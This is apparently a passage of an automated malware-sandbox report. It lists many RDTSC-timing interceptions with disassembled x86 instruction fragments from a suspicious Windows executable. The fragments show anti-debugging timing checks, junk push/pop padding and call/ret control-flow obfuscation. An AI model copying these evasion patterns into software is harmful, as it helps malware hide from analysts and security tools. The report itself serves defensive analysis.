                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C6381 second address: 6C63DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F2ADCE78B38h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 and bx, 0512h 0x00000028 and edi, dword ptr [ebp+122D29FCh] 0x0000002e push 00000000h 0x00000030 jmp 00007F2ADCE78B3Eh 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D1887h], ebx 0x0000003d mov bx, si 0x00000040 xchg eax, esi 0x00000041 jne 00007F2ADCE78B59h 0x00000047 push eax 0x00000048 push edx 0x00000049 jnc 00007F2ADCE78B36h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C63DE second address: 6C6408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F2ADCE7BD6Ch 0x00000012 jns 00007F2ADCE7BD66h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C7410 second address: 6C7414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C7414 second address: 6C7422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F2ADCE7BD66h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6CF84C second address: 6CF859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F2ADCE78B36h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6CF27B second address: 6CF283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6CF283 second address: 6CF290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6CF290 second address: 6CF294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6CF294 second address: 6CF298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6CF3EF second address: 6CF40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2ADCE7BD66h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop esi 0x0000000e pushad 0x0000000f jmp 00007F2ADCE7BD6Bh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D3774 second address: 6D3778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D3778 second address: 6D377E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D377E second address: 6D378D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D378D second address: 6D37B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F2ADCE7BD7Ch 0x00000014 jmp 00007F2ADCE7BD76h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D37B7 second address: 6D37BC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D37BC second address: 6D37D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a jnl 00007F2ADCE7BD68h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D37D9 second address: 6D37DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D37DD second address: 6D37E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D385D second address: 6D3864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D8832 second address: 6D8838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D8838 second address: 6D883C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D883C second address: 6D8842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D8F72 second address: 6D8F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F2ADCE78B3Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D8F85 second address: 6D8F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F2ADCE7BD66h 0x0000000a jp 00007F2ADCE7BD66h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D8F95 second address: 6D8FDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F2ADCE78B38h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2ADCE78B49h 0x00000017 pushad 0x00000018 jnl 00007F2ADCE78B36h 0x0000001e jmp 00007F2ADCE78B45h 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D92E0 second address: 6D92F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2ADCE7BD74h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D92F8 second address: 6D92FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D942C second address: 6D9456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 ja 00007F2ADCE7BD66h 0x0000000b jmp 00007F2ADCE7BD6Ah 0x00000010 jmp 00007F2ADCE7BD6Fh 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D9720 second address: 6D9745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE78B44h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b ja 00007F2ADCE78B36h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D9745 second address: 6D9749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D9749 second address: 6D974F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D9A2C second address: 6D9A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D9A30 second address: 6D9A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007F2ADCE78B36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D9A41 second address: 6D9A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6DE1D0 second address: 6DE1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F2ADCE78B43h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6DE1F0 second address: 6DE1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6DE5FC second address: 6DE602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6DE602 second address: 6DE60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6DDBDD second address: 6DDBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2ADCE78B36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6DE928 second address: 6DE96B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2ADCE7BD6Dh 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F2ADCE7BD72h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F2ADCE7BD76h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6DE96B second address: 6DE975 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2ADCE78B36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6DEC38 second address: 6DEC3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6DEC3C second address: 6DEC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AA8F2 second address: 6AA8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AA8F8 second address: 6AA90F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2ADCE78B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jnl 00007F2ADCE78B36h 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AA90F second address: 6AA957 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2ADCE7BD6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F2ADCE7BD68h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 sub dword ptr [ebp+12465AA6h], edi 0x0000002b lea eax, dword ptr [ebp+12486686h] 0x00000031 add dword ptr [ebp+122D1CBFh], esi 0x00000037 nop 0x00000038 push esi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AA957 second address: 68D23B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e jbe 00007F2ADCE78B36h 0x00000014 jmp 00007F2ADCE78B3Dh 0x00000019 popad 0x0000001a popad 0x0000001b nop 0x0000001c ja 00007F2ADCE78B3Ch 0x00000022 mov ecx, dword ptr [ebp+122D2A8Ch] 0x00000028 call dword ptr [ebp+122D372Ah] 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AAA1F second address: 6AAA37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F2ADCE7BD6Ch 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AAA37 second address: 6AAA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2ADCE78B42h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AAD0A second address: 6AAD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AADBE second address: 6AADDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2ADCE78B46h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AAE6B second address: 6AAEAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F2ADCE7BD75h 0x0000000b jg 00007F2ADCE7BD66h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F2ADCE7BD70h 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jno 00007F2ADCE7BD66h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AAEAD second address: 6AAEB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AAEB3 second address: 6AAEDF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2ADCE7BD6Ch 0x00000008 jns 00007F2ADCE7BD66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2ADCE7BD77h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AAEDF second address: 6AAEEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AB7B7 second address: 6AB7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AB7BB second address: 6AB81D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jc 00007F2ADCE78B41h 0x00000010 jbe 00007F2ADCE78B3Bh 0x00000016 xor edx, 5D027273h 0x0000001c push 0000001Eh 0x0000001e movsx edx, dx 0x00000021 nop 0x00000022 jmp 00007F2ADCE78B3Dh 0x00000027 push eax 0x00000028 pushad 0x00000029 push ebx 0x0000002a push edi 0x0000002b pop edi 0x0000002c pop ebx 0x0000002d pushad 0x0000002e jmp 00007F2ADCE78B45h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AB969 second address: 6AB96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AB96D second address: 6AB97A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2ADCE78B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ABAD6 second address: 6ABAFA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2ADCE7BD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push ecx 0x00000013 push ecx 0x00000014 jne 00007F2ADCE7BD66h 0x0000001a pop ecx 0x0000001b pop ecx 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push esi 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ABAFA second address: 6ABB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2ADCE78B36h 0x0000000a popad 0x0000000b pop esi 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ABB0C second address: 6ABB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ABB12 second address: 6ABB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jg 00007F2ADCE78B4Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2ADCE78B3Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ABB31 second address: 6ABB35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ABBF9 second address: 6ABC6C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2ADCE78B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F2ADCE78B38h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 lea eax, dword ptr [ebp+124866CAh] 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F2ADCE78B38h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 sub edx, 02415BD1h 0x0000004e nop 0x0000004f jnl 00007F2ADCE78B55h 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F2ADCE78B43h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ABC6C second address: 6ABC8E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2ADCE7BD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2ADCE7BD75h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ABC8E second address: 6ABCE1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F2ADCE78B36h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ecx, dword ptr [ebp+122D3356h] 0x00000013 mov dl, 04h 0x00000015 lea eax, dword ptr [ebp+12486686h] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F2ADCE78B38h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 sbb cx, 347Ch 0x0000003a or ecx, dword ptr [ebp+122D2900h] 0x00000040 nop 0x00000041 pushad 0x00000042 jnl 00007F2ADCE78B38h 0x00000048 pushad 0x00000049 popad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E34EE second address: 6E3508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE7BD76h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E3508 second address: 6E3530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B41h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F2ADCE78B3Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E39A7 second address: 6E39AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E39AD second address: 6E39C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B44h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E88F2 second address: 6E88F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E9468 second address: 6E948D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2ADCE78B36h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2ADCE78B46h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E948D second address: 6E94AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F2ADCE7BD66h 0x0000000d jmp 00007F2ADCE7BD6Fh 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E9729 second address: 6E9733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2ADCE78B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E9733 second address: 6E9755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F2ADCE7BD74h 0x0000000f rdtsc
